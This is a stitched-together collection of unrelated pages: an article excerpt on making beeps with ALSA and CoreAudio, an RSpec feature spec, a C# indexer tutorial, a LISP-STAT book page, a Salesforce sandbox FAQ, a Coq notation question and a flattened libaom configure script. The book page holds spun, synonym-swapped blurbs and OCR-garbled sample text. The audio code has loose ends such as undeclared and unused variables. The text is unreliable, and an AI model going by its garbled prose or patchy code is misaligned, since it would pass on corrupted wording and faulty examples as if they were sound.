They use JACK Audio Connection Kit. JACK was created for professional musicians and it cares about real-time playback, whereas PulseAudio was made for casual users who might tolerate some latency from their youtube playback. JACK connects audio apps with minimal latency, but keep in mind that it still works on top of ALSA, so if your app would be the only audio app running (i.e. if you are making a drum machine from an old Raspberry Pi) - then ALSA would be easier to use and would have a better performance.
Making a beeper function with ALSA is actually not so hard. We need to open the default audio device, configure it to use a well-supported sampling rate and sample format, and start writing data into it. Audio data can be a sawtooth wave, as described in the previous audio article.
int beep(int freq, int ms) {
static void *pcm = NULL;
if (pcm == NULL) {
if (snd_pcm_open(&pcm, "default", 0, 0)) {
return -1;
}
snd_pcm_set_params(pcm, 1, 3, 1, 8000, 1, 20000);
}
unsigned char buf[2400];
long frames;
long phase;
for (int i = 0; i < ms / 50; i++) {
snd_pcm_prepare(pcm);
for (int j = 0; j < sizeof(buf); j++) {
buf[j] = freq > 0 ? (255 * j * freq / 8000) : 0;
}
int r = snd_pcm_writei(pcm, buf, sizeof(buf));
if (r < 0) {
snd_pcm_recover(pcm, r, 0);
}
}
return 0;
}
Here we use synchronous API and we don’t check for errors to keep the function small and simple. Synchronous blocking I/O is probably not the best option for serious audio applications, and fortunately ALSA comes with various transfer methods and various modes of operation: https://www.alsa-project.org/alsa-doc/alsa-lib/pcm.html. But for our simple use case it’s totally fine.
If in doubt - use ALSA; if you have to cooperate with other audio apps - use JACK.
macOS
This one is rather simple, but not easy at all. MacOS has CoreAudio framework, responsible for audio functionality on both, desktop and iOS. CoreAudio itself is a low-level API, tightly integrated with OS to optimize latency and performance. To play some sound with CoreAudio one would have to create an AudioUnit (audio plugin).
AudioUnit API is a little verbose, but easy to understand, here’s how to create a new AudioUnit:
AudioComponent output;
AudioUnit unit;
AudioComponentDescription descr;
AURenderCallbackStruct cb;
AudioStreamBasicDescription stream;
descr.componentType = kAudioUnitType_Output,
descr.componentSubType = kAudioUnitSubType_DefaultOutput,
descr.componentManufacturer = kAudioUnitManufacturer_Apple,
// Actual sound will be generated asynchronously in the callback tone_cb
cb.inputProc = tone_cb;
stream.mFormatID = kAudioFormatLinearPCM;
stream.mFormatFlags = 0;
stream.mSampleRate = 8000;
stream.mBitsPerChannel = 8;
stream.mChannelsPerFrame = 1;
stream.mFramesPerPacket = 1;
stream.mBytesPerFrame = 1;
stream.mBytesPerPacket = 1;
output = AudioComponentFindNext(NULL, &descr);
AudioComponentInstanceNew(output, &unit);
AudioUnitSetProperty(unit, kAudioUnitProperty_SetRenderCallback,
kAudioUnitScope_Input, 0, &cb, sizeof(cb));
AudioUnitSetProperty(unit, kAudioUnitProperty_StreamFormat,
kAudioUnitScope_Input, 0, &stream, sizeof(stream));
AudioUnitInitialize(unit);
AudioOutputUnitStart(unit);
This code only creates and starts a new AudioUnit, the actual sound generation would happen asynchronously in the callback:
static OSStatus tone_cb(void *inRefCon,
AudioUnitRenderActionFlags *ioActionFlags,
const AudioTimeStamp *inTimeStamp, UInt32 inBusNumber,
UInt32 inNumberFrames, AudioBufferList *ioData) {
unsigned int frame;
unsigned char *buf = ioData->mBuffers[0].mData;
unsigned long i = 0;
for (i = 0; i < inNumberFrames; i++) {
buf[i] = beep_freq > 0 ? (255 * theta * beep_freq / 8000) : 0;
theta++;
counter--;
}
return 0;
}
This callback generates sound similarly to how we did it with ALSA, but it is called asynchronously when CoreAudio thinks that audio buffer is almost empty and needs to be filled with new audio samples.
Such asynchronous approach to sound generation is very common, and almost every modern audio library supports it. If you want to build a music app - you should probably design it with asynchronous playback in mind.
If in doubt - use CoreAudio.
Sounds like too much work
If you are building a music app - you may follow the same path, implement audio backend for WASAPI, ALSA and CoreAudio. Actually it’s not that hard. You may see the full sources of beep, it’s roughly 100 lines of code for all three platforms.
However, there are a number of good cross-platform libraries, such as:
Some people prefer using JUCE for cross-platform audio apps, but it has its own limitations. The audio ecosystem may appear complex, and there are too many choices, but most of them are good ones. So keep playing!
I hope you’ve enjoyed this article. You can follow – and contribute to – on Github, Mastodon, Twitter or subscribe via rss.
Dec 13, 2020
Project: RSpec Expectations 2.11
implicit docstrings
As an RSpec user
I want examples to generate their own names
So that I can reduce duplication between example names and example code
Scenarios
run passing examples
Given
a file named "implicit_docstrings_spec.rb" with:
describe "Examples with no docstrings generate their own:" do
specify { 3.should be < 5 }
specify { [1,2,3].should include(2) }
specify { [1,2,3].should respond_to(:size) }
end
When
I run rspec ./implicit_docstrings_spec.rb -fdoc
Then
the output should contain "should be < 5"
And
the output should contain "should include 2"
And
the output should contain "should respond to #size"
run failing examples
Given
a file named "failing_implicit_docstrings_spec.rb" with:
describe "Failing examples with no descriptions" do
# description is auto-generated as "should equal(5)" based on the last #should
it do
3.should equal(2)
5.should equal(5)
end
it { 3.should be > 5 }
it { [1,2,3].should include(4) }
it { [1,2,3].should_not respond_to(:size) }
end
When
I run rspec ./failing_implicit_docstrings_spec.rb -fdoc
Then
the output should contain "should equal 2"
And
the output should contain "should be > 5"
And
the output should contain "should include 4"
And
the output should contain "should not respond to #size"
Last published over 4 years ago by dchelimsky.
A simple explanation and usage of indexers in C#
2014-04-24 09:47:51
An indexer is a special kind of class member that lets an object be accessed in an array-like way, making programs more intuitive and easier to write.
1. Defining an indexer
Class members in C# can be of any type, including arrays and collections. When a class contains array or collection members, an indexer greatly simplifies access to those members.
An indexer is defined in much the same way as a property; its general form is:
[modifier] data_type this[index_type index]
{
    get { /* code to get the value */ }
    set { /* code to set the value */ }
}
The modifier can be public, protected, private, internal, new, virtual, sealed, override, abstract, or extern.
The data type is the type of the array or collection element that will be accessed.
The index type indicates which kind of index the indexer uses to access the array or collection elements; it can be an integer or a string. this refers to the array or collection member of the current object; you can informally think of it as the indexer's name, which is why an indexer cannot have a user-defined name. For example:
class Z
{
    // an integer collection that can hold 100 integers
    private long[] arr = new long[100];

    // declare the indexer
    public long this[int index]
    {
        get
        {
            // check the index range
            if (index < 0 || index >= 100)
            {
                return 0;
            }
            else
            {
                return arr[index];
            }
        }
        set
        {
            if (!(index < 0 || index >= 100))
            {
                arr[index] = value;
            }
        }
    }
}
2. Using an indexer
An indexer lets you access the array or collection member of a class instance much as you would an ordinary array. The general form is:
objectName[index]
The data type of the index must match the indexer's index type. For example:
Z z = new Z();
z[0] = 100;
z[1] = 101;
Console.WriteLine(z[0]);
This creates an object z and then uses an index to refer to the array elements inside that object.
C# does not restrict the index type to integers. For example, you can use a string as the index. Such an indexer can be implemented by searching the collection for the string and returning the corresponding value. Because accessors can be overloaded, the string and integer versions can coexist.
Example:
class DayCollection
{
string[] days={"Sun","Mon","Tues","Wed","Thurs","Fri","Sat"};
private int GetDay(string testDay)
{
int i=0;
foreach(string day in days)
{
if(day==testDay)
return i;
i++;
}
return -1;
}
public int this[string day]
{
get { return GetDay(day); }
}
}
static void Main(string[] args)
{
DayCollection week=new DayCollection();
Console.WriteLine("Fri:{0}",week["Fri"]);
Console.WriteLine("ABC:{0}",week["ABC"]);
}
Result: Fri:5
ABC:-1
3. Indexers in interfaces
Indexers can also be declared in interfaces. An interface indexer differs from a class indexer in two ways: first, an interface indexer does not use modifiers; second, an interface indexer contains only the accessors get or set, with no implementation bodies. The accessors indicate whether the indexer is read-write, read-only, or write-only: if it is read-write, neither the get nor the set accessor may be omitted; if it is read-only, omit the set accessor; if it is write-only, omit the get accessor. For example:
public interface IAddress
{
string this[int index]{get;set;}
string Address{get;set;}
string Answer();
}
The declared interface IAddress contains three members: an indexer, a property, and a method; the indexer is read-write.
4. Comparing indexers and properties
Indexers and properties are both class members and are syntactically very similar. Indexers are generally used in custom collection classes, where operating on the collection object through an indexer is as simple as using an array; properties can be used in any custom class and add flexibility to its field members.
Property | Indexer
Allows methods to be called as if they were public data members | Allows methods on an object to be called as if the object were an array
Accessed through a simple name | Accessed through an index
Can be a static or an instance member | Must be an instance member
Its get accessor has no parameters | Its get accessor has the same formal parameter list as the indexer
Its set accessor contains the implicit value parameter | In addition to the value parameter, its set accessor has the same formal parameter list as the indexer
LISP-STAT: An Object-Oriented Environment for Statistical by Luke Tierney
By Luke Tierney
Written for the professional statistician or graduate statistics student, the primary purpose of this book is to describe a system, based on the LISP language, for statistical computing and dynamic graphics, and to show how it can be used as an effective platform for a wide range of statistical computing tasks, from simple calculations to customizing dynamic graphs. In addition, it introduces object-oriented programming and graphics programming in a statistical context. The discussion of these ideas is based on the Lisp-Stat system; readers with access to such a system can reproduce the examples presented and use them as a basis for further experimentation and study.
Similar object-oriented design books
Pro Active Record: Databases with Ruby and Rails
Seasoned energetic checklist is helping you're taking benefit of the total strength of your database engine from inside your Ruby courses and Rails purposes. ActiveRecord, a part of the magic that makes the Rails framework so robust and straightforward to take advantage of, is the version part of Rails model/view/controller framework. Its an object-relational mapping library permitting you to have interaction with databases from either Ruby and Rails purposes.
Liferay 6.2 User Interface Development
Liferay employs a really good theming procedure in an effort to swap the appear and feel of the consumer interfaces. Liferay Portal presents structure templates on the way to describe how a number of columns and rows are prepared to exhibit portlets. It additionally presents subject matters that may be used to customise the final feel and appear of sites and websites.
Control flow semantics
Keep an eye on movement Semantics offers a unified, formal remedy of the semantics of a large spectrum of keep watch over stream notions as present in sequential, concurrent, good judgment, object-oriented, and sensible programming languages. while in additional conventional ways one makes a speciality of input/output habit, during this paintings equivalent realization is dedicated to finite and limitless computations, the latter stimulated through the starting to be value of reactive platforms.
Apache Camel Developer's Cookbook
Apache Camel is a de-facto regular for constructing integrations in Java, and is predicated on well-understood firm Integration styles. it truly is used inside many advertisement and open resource integration items. Camel makes universal integration initiatives effortless whereas nonetheless supplying the developer with the ability to customise the framework whilst the placement calls for it.
Extra resources for LISP-STAT: An Object-Oriented Environment for Statistical Computing and Dynamic Graphics (Wiley Series in Probability and Statistics)
Sample text
2, we can put ethanol arid oxygen in a scatterplot and sugar in a histogram. 12. he name-list function to generate a window with a list of labels in it. This window can be Iinked with any plot, and selecting a label in a name list will then highlight the corresponding points in the linked plots. You can use the -17 name-list function with a nuinerical argument; for example. (name-list 10) gmeratm a name list with rlic lab& YY , . . '9", or you rail give it a list of labels of your own. 2. 5 Modifying a Scatterplot After producing a scatterplot of a data set, you might like to add a line, for example, a regression line.
2 above. and :point-showingare useful for dynamic simulations. Here is the help information for :pointselected in a histograin: > (send h :help :point-selected) :POINT-SELECTED Method args: (point &optional selected) Sets or returns selection status (true or NIL) of POINT. Sends :ADJUST-SCREEN message if states are set. Vectorized. '"dotimes is onc of several Lisp looping constructs It is a special form with the syntax (dotimes ( ( a a t ) ( c o u n t ) ) ( ~ ~ F J T - } . . ). The loop is repeated (count) times, with (tlar) hound to 0 , 1, .
The term vectorozed in a function's documentation means the function can be applied to arguments that are lists; the result is a Kist of the results of applying the function to each element. A related term appearing in the documentation of some functions is vector reducing. A function is vector reducing if it is applied recursively to its arguments until a single number results. The functions sum,prod,max,and min are vector reducing. ing of the symbols that contain "norin" as part of their name > (apropos 'norm) NORMAL-QUANT NORMAL-RAND NORMAL-CDF NORMAL-DENS NORMAL BIVNORM-CDF NORM and then w e help to ask for more information about each of these symbols.
Can You Delete A Sandbox Salesforce?
Why can't we delete a user in Salesforce?
Hi Saurabh, You cannot delete users from Salesforce.
You can remove their license or deactivate them to remove access to the system, but because they may still own records, they cannot be deleted..
How do I delete my sandbox account?
To delete an account: Log in to the Developer Dashboard and navigate to the Sandbox>>Accounts page. In the Manage Accounts column, click the icon associated with the account you want to manage. Click Delete.
Can we delete users in Salesforce?
You can’t delete a user, but you can deactivate an account so a user can no longer log in to Salesforce.
What is Sandbox Salesforce?
Introduction to Sandboxes Sandbox is a copy of your production organization. You can create multiple copies of your organization in separate environments for different purposes such as development, testing and training, without compromising the data and applications in your production organization.
What happens when you refresh a sandbox Salesforce?
Refreshing a sandbox updates the sandbox’s metadata from its source org. If the sandbox is a clone or if it uses a sandbox template, the refresh process updates the org’s data in addition to its metadata.
How do I find my Salesforce Sandbox?
To access your sandbox, click the link in the notification email. Users can log in to the sandbox at https://test.salesforce.com by appending . sandbox_name to their Salesforce usernames.
How often can you refresh a Salesforce Sandbox?
Every 29 days. SALESFORCE SANDBOX REFRESH LIMITS: For Full Copy sandboxes, you can refresh once every 29 days. Partial Copy sandboxes contain only a fraction of your production data and so can be refreshed more frequently.
How long does a sandbox refresh take salesforce?
For full sandboxes, plan for a minimum of 48 hours, as the timing of the refresh depends on the Salesforce queue and also on the amount of data. If you have multiple lines of business using one Salesforce org, create a sandbox template for each business depending on its requirements.
What happens when you deactivate a user in Salesforce?
The deactivated user is the file owner until an admin reassigns the files to an active user. … You can create and edit accounts, opportunities, and custom object records that are owned by inactive users. For example, you can edit the Account Name field on an opportunity record that’s owned by an inactive user.
How do I turn off sandbox?
1. Enable or disable Windows Sandbox using the Control Panel. Locate Windows Sandbox in the list in the opened window, then activate or deactivate the checkbox to enable or disable this option respectively. Tap the OK button and restart your PC to apply the changes.
What does no sandbox mean in Chrome?
Google Chrome sandboxing feature: the "--no-sandbox" switch. We have some web developers who want Google Chrome for testing purposes. For some reason it crashes upon launching unless we disable the sandboxing feature by adding "--no-sandbox" to the shortcut target. … The sandbox is Chrome's process-isolation security technology.
What is Apex class in Salesforce Sandbox?
With the help of a Sandbox Refresh Apex class, you can process data, execute scripts for business logic, or create test data in your newly created or refreshed sandbox. This feature is very useful when a Salesforce instance is refreshed frequently.
When should you refresh a sandbox Salesforce?
Every 29 days. You can refresh a Full sandbox 29 days after you created or last refreshed it. If you delete a Full sandbox within those 29 days, you need to wait until the 29-day period from the date of last refresh or creation has passed before you can replace it.
What is Sandbox coloring?
The Sandbox Coloring app takes coloring by number into the digital age, by offering coloring pages for mobile devices. … The Sandbox Coloring app is a color-by-number app that presents coloring pages with color legends which users fill in pixel by pixel.
What is the purpose of the sandbox?
A sandbox is a safe isolated environment that replicates an end user operating environment where you can run code, observe it and rate it based on activity rather than attributes. You can run executable files, allow contained network traffic and more that can contain hidden malware in a sandbox.
How do I delete photos from sandbox?
To delete a saved sandbox: In the Saved Sandboxes dashboard, click the Actions button at the end of the row and select Delete. A “Deletion in progress” message is displayed next to the name of the saved sandbox.
How do I remove sandbox from Chrome?
How to Disable Chrome Sandbox: Create a desktop shortcut for the Google Chrome application if you do not already have one. Right-click the shortcut and click "Properties." Click the "Shortcut" tab. Type " --no-sandbox" (without quotes) after the path to the application in the "Target" input box.
Does sandbox coloring use data?
The app is a color by number coloring book, but on your phone. … The app only requires data, unless there is a need to download new pictures to color.
What is the difference between freeze and deactivate in Salesforce?
Freeze – Temporarily disable the account. Good for returning users. Deactivate – Suspend the user account entirely and they are not returning users.
How do you get rid of a sandbox environment?
Delete a sandbox from Setup: Log in to your organization. Click Setup. Enter "sandboxes" in the Quick Find box and click Sandboxes. Click Del next to the sandbox you want to delete. Select "I understand the operation I am about to perform." Click Delete.
Notation for a coinductive type
I made something like a list that keeps repeating using CoInductive with
CoInductive ilist {A : Type} : Type :=
| icons : A -> ilist -> ilist.
and I can construct its objects without error:
(* Means a list like [[3;4; 3;4; 3;4; 3;4; .....]] *)
CoFixpoint foo := (icons 3 (icons 4 foo)).
How can we make a notation to do the list construction?
I was trying to make a notation that will allow constructing the same list as above as: [[ 3; 4; NIL ]].
Where NIL is used to denote the end of the ‘basic part’ (ie, the part which keeps repeating in the list) of the list.
So I tried:
Notation "[[ x ; y ; .. ; z ; 'NIL' ]]" := (cofix Foo : ilist :=
(icons x (icons y .. (icons z Foo) .. )))
That ran okay.
But using the notation itself didn’t work.
Compute [[ NIL ]].
(*
Syntax error: ';' expected after [term level 200] (in [term]).
*)
Compute [[ 1 ; 2 ; 3 ; NIL ]].
(*
Syntax error: ';' or ';' 'NIL' ']]' expected (in [term]).
*)
What am I missing here?
Not sure what the issue is with the notation you want (I am not a notation expert), but if this is good enough for you,
Notation "[[ x ; .. ; z ]]" := (cofix Foo : ilist :=
(icons x .. (icons z Foo) .. )).
should fix your second example. As for the first one, you could add a specific notation (as is done e.g. for the empty list), but the term you would bind it to (cofix Foo : ilist := Foo) is not valid because it is not guarded.
#!/bin/sh ## ## configure ## ## This script is the front-end to the build system. It provides a similar ## interface to standard configure scripts with some extra bits for dealing ## with toolchains that differ from the standard POSIX interface and ## for extracting subsets of the source tree. In theory, reusable parts ## of this script were intended to live in build/make/configure.sh, ## but in practice, the line is pretty blurry. ## ## This build system is based in part on the FFmpeg configure script. ## #source_path="`dirname \"$0\"`" source_path=${0%/*} . "${source_path}/build/make/configure.sh" show_help(){ show_help_pre cat << EOF Advanced options: ${toggle_libs} libraries ${toggle_examples} examples ${toggle_docs} documentation ${toggle_unit_tests} unit tests ${toggle_decode_perf_tests} build decoder perf tests with unit tests ${toggle_encode_perf_tests} build encoder perf tests with unit tests --cpu=CPU tune for the specified CPU (ARM: cortex-a8, X86: sse3) --libc=PATH path to alternate libc --size-limit=WxH max size to allow in the decoder --as={yasm|nasm|auto} use specified assembler [auto, yasm preferred] --sdk-path=PATH path to root of sdk (android builds only) ${toggle_codec_srcs} in/exclude codec library source code ${toggle_debug_libs} in/exclude debug version of libraries ${toggle_static_msvcrt} use static MSVCRT (VS builds only) ${toggle_aom_highbitdepth} use high bit depth (10/12) profiles ${toggle_better_hw_compatibility} enable encoder to produce streams with better hardware decoder compatibility ${toggle_av1} AV1 codec support ${toggle_internal_stats} output of encoder internal stats for debug, if supported (encoders) ${toggle_postproc} postprocessing ${toggle_av1_postproc} av1 specific postprocessing ${toggle_multithread} multithreaded encoding and decoding ${toggle_spatial_resampling} spatial sampling (scaling) support ${toggle_realtime_only} enable this option while building for real-time encoding ${toggle_onthefly_bitpacking} enable on-the-fly bitpacking in real-time encoding ${toggle_error_concealment} enable this option to get a decoder which is able to conceal losses ${toggle_coefficient_range_checking} enable decoder to check if intermediate transform coefficients are in valid range ${toggle_runtime_cpu_detect} runtime cpu detection ${toggle_shared} shared library support ${toggle_static} static library support ${toggle_small} favor smaller size over speed ${toggle_postproc_visualizer} macro block / block level visualizers ${toggle_multi_res_encoding} enable multiple-resolution encoding ${toggle_temporal_denoising} enable temporal denoising and disable the spatial denoiser ${toggle_av1_temporal_denoising} enable av1 temporal denoising ${toggle_webm_io} enable input from and output to WebM container ${toggle_libyuv} enable libyuv ${toggle_accounting} enable bit accounting Codecs: Codecs can be selectively enabled or disabled individually, or by family: --disable- is equivalent to: --disable--encoder --disable--decoder Codecs available in this distribution: EOF #restore editor state ' family=""; last_family=""; c=""; str=""; for c in ${CODECS}; do family=${c%_*} if [ "${family}" != "${last_family}" ]; then [ -z "${str}" ] || echo "${str}" str="$(printf ' %10s:' ${family})" fi str="${str} $(printf '%10s' ${c#*_})" last_family=${family} done echo "${str}" show_help_post } ## ## BEGIN APPLICATION SPECIFIC CONFIGURATION ## # all_platforms is a list of all supported target platforms. Maintain # alphabetically by architecture, generic-gnu last. 
all_platforms="${all_platforms} arm64-darwin-gcc" all_platforms="${all_platforms} arm64-linux-gcc" all_platforms="${all_platforms} armv6-linux-rvct" all_platforms="${all_platforms} armv6-linux-gcc" all_platforms="${all_platforms} armv6-none-rvct" all_platforms="${all_platforms} armv7-android-gcc" #neon Cortex-A8 all_platforms="${all_platforms} armv7-darwin-gcc" #neon Cortex-A8 all_platforms="${all_platforms} armv7-linux-rvct" #neon Cortex-A8 all_platforms="${all_platforms} armv7-linux-gcc" #neon Cortex-A8 all_platforms="${all_platforms} armv7-none-rvct" #neon Cortex-A8 all_platforms="${all_platforms} armv7-win32-vs11" all_platforms="${all_platforms} armv7-win32-vs12" all_platforms="${all_platforms} armv7-win32-vs14" all_platforms="${all_platforms} armv7s-darwin-gcc" all_platforms="${all_platforms} armv8-linux-gcc" all_platforms="${all_platforms} mips32-linux-gcc" all_platforms="${all_platforms} mips64-linux-gcc" all_platforms="${all_platforms} sparc-solaris-gcc" all_platforms="${all_platforms} x86-android-gcc" all_platforms="${all_platforms} x86-darwin8-gcc" all_platforms="${all_platforms} x86-darwin8-icc" all_platforms="${all_platforms} x86-darwin9-gcc" all_platforms="${all_platforms} x86-darwin9-icc" all_platforms="${all_platforms} x86-darwin10-gcc" all_platforms="${all_platforms} x86-darwin11-gcc" all_platforms="${all_platforms} x86-darwin12-gcc" all_platforms="${all_platforms} x86-darwin13-gcc" all_platforms="${all_platforms} x86-darwin14-gcc" all_platforms="${all_platforms} x86-darwin15-gcc" all_platforms="${all_platforms} x86-iphonesimulator-gcc" all_platforms="${all_platforms} x86-linux-gcc" all_platforms="${all_platforms} x86-linux-icc" all_platforms="${all_platforms} x86-os2-gcc" all_platforms="${all_platforms} x86-solaris-gcc" all_platforms="${all_platforms} x86-win32-gcc" all_platforms="${all_platforms} x86-win32-vs10" all_platforms="${all_platforms} x86-win32-vs11" all_platforms="${all_platforms} x86-win32-vs12" all_platforms="${all_platforms} x86-win32-vs14" all_platforms="${all_platforms} x86_64-android-gcc" all_platforms="${all_platforms} x86_64-darwin9-gcc" all_platforms="${all_platforms} x86_64-darwin10-gcc" all_platforms="${all_platforms} x86_64-darwin11-gcc" all_platforms="${all_platforms} x86_64-darwin12-gcc" all_platforms="${all_platforms} x86_64-darwin13-gcc" all_platforms="${all_platforms} x86_64-darwin14-gcc" all_platforms="${all_platforms} x86_64-darwin15-gcc" all_platforms="${all_platforms} x86_64-iphonesimulator-gcc" all_platforms="${all_platforms} x86_64-linux-gcc" all_platforms="${all_platforms} x86_64-linux-icc" all_platforms="${all_platforms} x86_64-solaris-gcc" all_platforms="${all_platforms} x86_64-win64-gcc" all_platforms="${all_platforms} x86_64-win64-vs10" all_platforms="${all_platforms} x86_64-win64-vs11" all_platforms="${all_platforms} x86_64-win64-vs12" all_platforms="${all_platforms} x86_64-win64-vs14" all_platforms="${all_platforms} generic-gnu" # all_targets is a list of all targets that can be configured # note that these should be in dependency order for now. all_targets="libs examples docs" # all targets available are enabled, by default. for t in ${all_targets}; do [ -f "${source_path}/${t}.mk" ] && enable_feature ${t} done if ! 
perl --version >/dev/null; then die "Perl is required to build" fi if [ "`cd \"${source_path}\" && pwd`" != "`pwd`" ]; then # test to see if source_path already configured if [ -f "${source_path}/aom_config.h" ]; then die "source directory already configured; run 'make distclean' there first" fi fi # check installed doxygen version doxy_version=$(doxygen --version 2>/dev/null) doxy_major=${doxy_version%%.*} if [ ${doxy_major:-0} -ge 1 ]; then doxy_version=${doxy_version#*.} doxy_minor=${doxy_version%%.*} doxy_patch=${doxy_version##*.} [ $doxy_major -gt 1 ] && enable_feature doxygen [ $doxy_minor -gt 5 ] && enable_feature doxygen [ $doxy_minor -eq 5 ] && [ $doxy_patch -ge 3 ] && enable_feature doxygen fi # disable codecs when their source directory does not exist [ -d "${source_path}/av1" ] || disable_codec av1 # install everything except the sources, by default. sources will have # to be enabled when doing dist builds, since that's no longer a common # case. enabled doxygen && enable_feature install_docs enable_feature install_bins enable_feature install_libs enable_feature static enable_feature optimizations enable_feature dependency_tracking enable_feature spatial_resampling enable_feature multithread enable_feature os_support enable_feature temporal_denoising CODECS=" av1_encoder av1_decoder " CODEC_FAMILIES=" av1 " ARCH_LIST=" arm mips x86 x86_64 " ARCH_EXT_LIST_X86=" mmx sse sse2 sse3 ssse3 sse4_1 avx avx2 " ARCH_EXT_LIST=" edsp media neon neon_asm mips32 dspr2 msa mips64 ${ARCH_EXT_LIST_X86} " HAVE_LIST=" ${ARCH_EXT_LIST} aom_ports pthread_h unistd_h " EXPERIMENT_LIST=" fp_mb_stats emulate_hardware clpf dering var_tx rect_tx ref_mv dual_filter ext_tx tx64x64 sub8x8_mc ext_intra filter_intra ext_inter ext_interp ext_refs global_motion new_quant supertx ans ec_multisymbol loop_restoration ext_partition ext_partition_types ext_tile motion_var warped_motion entropy bidir_pred bitstream_debug alt_intra palette daala_ec pvq cb4x4 frame_size delta_q adapt_scan filter_7bit parallel_deblocking tile_groups ec_adapt rd_debug reference_buffer coef_interleave " CONFIG_LIST=" dependency_tracking external_build install_docs install_bins install_libs install_srcs debug gprof gcov rvct gcc msvs pic big_endian codec_srcs debug_libs dequant_tokens dc_recon runtime_cpu_detect postproc av1_postproc multithread internal_stats ${CODECS} ${CODEC_FAMILIES} encoders decoders static_msvcrt spatial_resampling realtime_only onthefly_bitpacking error_concealment shared static small postproc_visualizer os_support unit_tests webm_io libyuv accounting decode_perf_tests encode_perf_tests multi_res_encoding temporal_denoising av1_temporal_denoising coefficient_range_checking aom_highbitdepth better_hw_compatibility experimental size_limit aom_qm ${EXPERIMENT_LIST} " CMDLINE_SELECT=" dependency_tracking external_build extra_warnings werror install_docs install_bins install_libs install_srcs debug gprof gcov pic optimizations ccache runtime_cpu_detect thumb libs examples docs libc as size_limit codec_srcs debug_libs dequant_tokens dc_recon postproc av1_postproc multithread internal_stats ${CODECS} ${CODEC_FAMILIES} static_msvcrt spatial_resampling realtime_only onthefly_bitpacking error_concealment shared static small postproc_visualizer unit_tests webm_io libyuv accounting decode_perf_tests encode_perf_tests multi_res_encoding temporal_denoising av1_temporal_denoising coefficient_range_checking better_hw_compatibility aom_highbitdepth experimental aom_qm tile_groups " process_cmdline() { for opt do optval="${opt#*=}" 
case "$opt" in --disable-codecs) for c in ${CODEC_FAMILIES}; do disable_codec $c; done ;; --enable-?*|--disable-?*) eval `echo "$opt" | sed 's/--/action=/;s/-/ option=/;s/-/_/g'` if is_in ${option} ${EXPERIMENT_LIST}; then if enabled experimental; then ${action}_feature $option else log_echo "Ignoring $opt -- not in experimental mode." fi elif is_in ${option} "${CODECS} ${CODEC_FAMILIES}"; then ${action}_codec ${option} else process_common_cmdline $opt fi ;; *) process_common_cmdline "$opt" ;; esac done } post_process_cmdline() { c="" # Enable all detected codecs, if they haven't been disabled for c in ${CODECS}; do soft_enable $c; done # Enable the codec family if any component of that family is enabled for c in ${CODECS}; do enabled $c && enable_feature ${c%_*} done # Set the {en,de}coders variable if any algorithm in that class is enabled for c in ${CODECS}; do enabled ${c} && enable_feature ${c##*_}s done # Enable ref_mv by default soft_enable ref_mv # Enable daala_ec by default ! enabled ans && soft_enable daala_ec # Fix up experiment dependencies enabled ec_adapt && enable_feature ec_multisymbol enabled ec_multisymbol && ! enabled ans && soft_enable daala_ec enabled ec_multisymbol && ! enabled daala_ec && soft_enable ans enabled daala_ec && enable_feature ec_multisymbol if enabled global_motion && (enabled ext_inter || enabled dual_filter); then log_echo "global_motion currently not compatible with ext_inter" log_echo "and dual_filter. Disabling global_motion." disable_feature global_motion fi } process_targets() { enabled child || write_common_config_banner write_common_target_config_h ${BUILD_PFX}aom_config.h write_common_config_targets # Calculate the default distribution name, based on the enabled features cf="" DIST_DIR=aom for cf in $CODEC_FAMILIES; do if enabled ${cf}_encoder && enabled ${cf}_decoder; then DIST_DIR="${DIST_DIR}-${cf}" elif enabled ${cf}_encoder; then DIST_DIR="${DIST_DIR}-${cf}cx" elif enabled ${cf}_decoder; then DIST_DIR="${DIST_DIR}-${cf}dx" fi done enabled debug_libs && DIST_DIR="${DIST_DIR}-debug" enabled codec_srcs && DIST_DIR="${DIST_DIR}-src" ! enabled postproc && ! enabled av1_postproc && DIST_DIR="${DIST_DIR}-nopost" ! enabled multithread && DIST_DIR="${DIST_DIR}-nomt" ! 
enabled install_docs && DIST_DIR="${DIST_DIR}-nodocs" DIST_DIR="${DIST_DIR}-${tgt_isa}-${tgt_os}" case "${tgt_os}" in win*) enabled static_msvcrt && DIST_DIR="${DIST_DIR}mt" || DIST_DIR="${DIST_DIR}md" DIST_DIR="${DIST_DIR}-${tgt_cc}" ;; esac if [ -f "${source_path}/build/make/version.sh" ]; then ver=`"$source_path/build/make/version.sh" --bare "$source_path"` DIST_DIR="${DIST_DIR}-${ver}" VERSION_STRING=${ver} ver=${ver%%-*} VERSION_PATCH=${ver##*.} ver=${ver%.*} VERSION_MINOR=${ver##*.} ver=${ver#v} VERSION_MAJOR=${ver%.*} fi enabled child || cat <> config.mk PREFIX=${prefix} ifeq (\$(MAKECMDGOALS),dist) DIST_DIR?=${DIST_DIR} else DIST_DIR?=\$(DESTDIR)${prefix} endif LIBSUBDIR=${libdir##${prefix}/} VERSION_STRING=${VERSION_STRING} VERSION_MAJOR=${VERSION_MAJOR} VERSION_MINOR=${VERSION_MINOR} VERSION_PATCH=${VERSION_PATCH} CONFIGURE_ARGS=${CONFIGURE_ARGS} EOF enabled child || echo "CONFIGURE_ARGS?=${CONFIGURE_ARGS}" >> config.mk # # Write makefiles for all enabled targets # for tgt in libs examples docs solution; do tgt_fn="$tgt-$toolchain.mk" if enabled $tgt; then echo "Creating makefiles for ${toolchain} ${tgt}" write_common_target_config_mk $tgt_fn ${BUILD_PFX}aom_config.h #write_${tgt}_config fi done } process_detect() { if enabled shared; then # Can only build shared libs on a subset of platforms. Doing this check # here rather than at option parse time because the target auto-detect # magic happens after the command line has been parsed. case "${tgt_os}" in linux|os2|darwin*|iphonesimulator*) # Supported platforms ;; *) if enabled gnu; then echo "--enable-shared is only supported on ELF; assuming this is OK" else die "--enable-shared only supported on ELF, OS/2, and Darwin for now" fi ;; esac fi if [ -z "$CC" ] || enabled external_build; then echo "Bypassing toolchain for environment detection." enable_feature external_build check_header() { log fake_check_header "$@" header=$1 shift var=`echo $header | sed 's/[^A-Za-z0-9_]/_/g'` disable_feature $var # Headers common to all environments case $header in stdio.h) true; ;; *) result=false for d in "$@"; do [ -f "${d##-I}/$header" ] && result=true && break done ${result:-true} esac && enable_feature $var # Specialize windows and POSIX environments. case $toolchain in *-win*-*) # Don't check for any headers in Windows builds. false ;; *) case $header in pthread.h) true;; unistd.h) true;; *) false;; esac && enable_feature $var esac enabled $var } check_ld() { true } fi check_header stdio.h || die "Unable to invoke compiler: ${CC} ${CFLAGS}" check_ld <> ${BUILD_PFX}aom_config.c #include "aom/aom_codec.h" static const char* const cfg = "$CONFIGURE_ARGS"; const char *aom_codec_build_config(void) 